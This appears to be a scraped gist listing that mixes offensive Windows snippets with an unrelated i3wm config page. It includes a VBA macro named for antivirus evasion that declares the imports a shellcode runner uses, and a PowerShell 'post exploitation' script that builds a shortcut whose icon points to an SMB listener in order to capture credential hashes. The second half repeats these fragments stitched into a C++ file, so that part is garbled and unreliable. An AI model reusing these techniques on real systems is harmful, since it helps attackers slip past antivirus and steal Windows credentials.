prachauthit

## macro_evade_av.vba
#If VBA7 Then
    Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Fkfpnhh As Long, ByVal Xref As Long, ByVal Jxnj As LongPtr, Mlgstptp As Long, ByVal Bydro As Long, Rny As Long) As LongPtr
    Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Kqkx As Long, ByVal Lxnvzgxp As Long, ByVal Qylxwyeq As Long, ByVal Jpcp As Long) As LongPtr
    Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Sreratdzx As LongPtr, ByRef Bzcaonphm As Any, ByVal Vxquo As Long) As LongPtr
#Else
    Private Declare Function CreateThread Lib "kernel32" (ByVal Fkfpnhh As Long, ByVal Xref As Long, ByVal Jxnj As Long, Mlgstptp As Long, ByVal Bydro As Long, Rny As Long) As Long
    Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Kqkx As Long, ByVal Lxnvzgxp As Long, ByVal Qylxwyeq As Long, ByVal Jpcp As Long) As Long
    Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Sreratdzx As Long, ByRef Bzcaonphm As Any, ByVal Vxquo As Long) As Long
#End If

## awesome_i3wm.md

      
              11 files
            
          
              4 forks
            
          
              2 comments
            
          
              16 stars
            
          
                it-is-michal
                / awesome_i3wm.md
            
            
              Last active
              January 10, 2023 20:28
            
              
                My current i3wm config
              
          
    Awesome i3wm


multimedia keys
next/prev window using i3ipc-python


## .LNK PowerShell Post Exploitation
$LinkedEXE = "$env:SystemRoot\System32\notepad.exe"
$LNKSaveFile = "pathtosavelnk"
$WScriptShell = New-Object -ComObject Wscript.Shell
$Shortcut = $WScriptShell.CreateShortcut($LNKSaveFile)
$Shortcut.TargetPath = $LinkedEXE
$Shortcut.IconLocation = "\\IPOFSMBLISTENER\images\images.ico"
$Shortcut.save()


## ZwDelayExecution1.cpp
/*
 http://moustafasaleh.blogspot.com/ (@msaleh83)
 Example of dynamically linking ZwDelayExecution Windows internal API

 compile:
 cl ZwDelayExecution1.cpp kernel32.lib user32.lib
 gcc ZwDelayExecution1.cpp -o ZwDelayExecution1.exe
*/

#define UNICODE
	#If VBA7 Then
	Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Fkfpnhh As Long, ByVal Xref As Long, ByVal Jxnj As LongPtr, Mlgstptp As Long, ByVal Bydro As Long, Rny As Long) As LongPtr
	Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Kqkx As Long, ByVal Lxnvzgxp As Long, ByVal Qylxwyeq As Long, ByVal Jpcp As Long) As LongPtr
	Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Sreratdzx As LongPtr, ByRef Bzcaonphm As Any, ByVal Vxquo As Long) As LongPtr
	#Else
	Private Declare Function CreateThread Lib "kernel32" (ByVal Fkfpnhh As Long, ByVal Xref As Long, ByVal Jxnj As Long, Mlgstptp As Long, ByVal Bydro As Long, Rny As Long) As Long
	Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Kqkx As Long, ByVal Lxnvzgxp As Long, ByVal Qylxwyeq As Long, ByVal Jpcp As Long) As Long
	Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Sreratdzx As Long, ByRef Bzcaonphm As Any, ByVal Vxquo As Long) As Long
	#End If
	$LinkedEXE = "$env:SystemRoot\System32\notepad.exe"
	$LNKSaveFile = "pathtosavelnk"
	$WScriptShell = New-Object -ComObject Wscript.Shell
	$Shortcut = $WScriptShell.CreateShortcut($LNKSaveFile)
	$Shortcut.TargetPath = $LinkedEXE
	$Shortcut.IconLocation = "\\IPOFSMBLISTENER\images\images.ico"
	$Shortcut.save()
	/*
	http://moustafasaleh.blogspot.com/ (@msaleh83)
	Example of dynamically linking ZwDelayExecution Windows internal API

	compile:
	cl ZwDelayExecution1.cpp kernel32.lib user32.lib
	gcc ZwDelayExecution1.cpp -o ZwDelayExecution1.exe
	*/

	#define UNICODE